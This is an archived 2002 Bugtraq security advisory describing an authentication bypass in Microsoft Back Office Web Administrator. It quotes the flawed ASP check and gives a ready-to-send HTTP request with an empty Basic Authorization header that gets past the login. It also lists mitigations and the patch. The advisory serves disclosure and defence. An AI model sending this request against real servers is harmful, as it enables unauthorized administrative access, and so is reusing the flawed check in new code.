From nisr@ngssoftware.com Thu Apr 18 13:38:36 2002 From: NGSSoftware Insight Security Research To: bugtraq@securityfocus.com Date: Tue, 16 Apr 2002 15:08:47 +0100 Subject: Back Office Web Administrator Authentication Bypass (#NISR17042002A) [The following text is in the "iso-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] NGSSoftware Insight Security Research Advisory Name: Back Office Web Administration Authentication Bypass Systems Affected: Microsoft's Back Office Web Administrator 4.0, 4.5 Severity: Medium/High Vendor URL: http://www.microsoft.com Author: David Litchfield (david@ngssoftware.com) Date: 17th April 2002 Advisory number: #NISR17042002A Advisory URL: http://www.ngssoftware.com/advisories/boa.txt Issue: Attackers can bypass the logon page and access the Back Office Web Administrator Description *********** With the Microsoft Back Office suite of products comes a web based administration ASP based application that runs on IIS. Normally, to use the administration pages a user must authenticate but NGSSoftware have discovered that it is trivial to bypass this. Details ******* Each of the Back Office Web Administrator ASP pages checks to see if the user has been authenticated but does this with the following snippet of code If Request.ServerVariables("auth_type") = "" Then Response.Status = "401 ACCESS DENIED" Response.End End If This is the only "authorization/authentication" performed. As such it's trivial to bypass: GET /BOADMIN/BACKOFFICE/SERVICES.ASP HTTP/1.1 Host: hostname Authorization: Basic [enter] [enter] No credentials are required as, technically the auth_type envariable has been set, regardless of whether a user name or password have been supplied. Risk and Mitigating Factors *************************** By default the Back Office Web Administrator is limited to the loopback address (127.0.0.1) which means that it can't be accessed remotely. However, it is not uncommon to change this to allow for remote administration; tying the Administrator to the loopback address makes it somewhat useless. Basic authentication also needs to be enabled which, again, is not uncommon. Fix Information *************** For those that match this criteria they are strongly urged to obtain the the patch from Microsoft. Please see http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316838& for more details. A check for this issue has also been added to Typhon II, NGSSoftware's vulnerabilty assessment scanner. For more information about Typhon, please see the NGSSite @ http://www.ngssoftware.com/.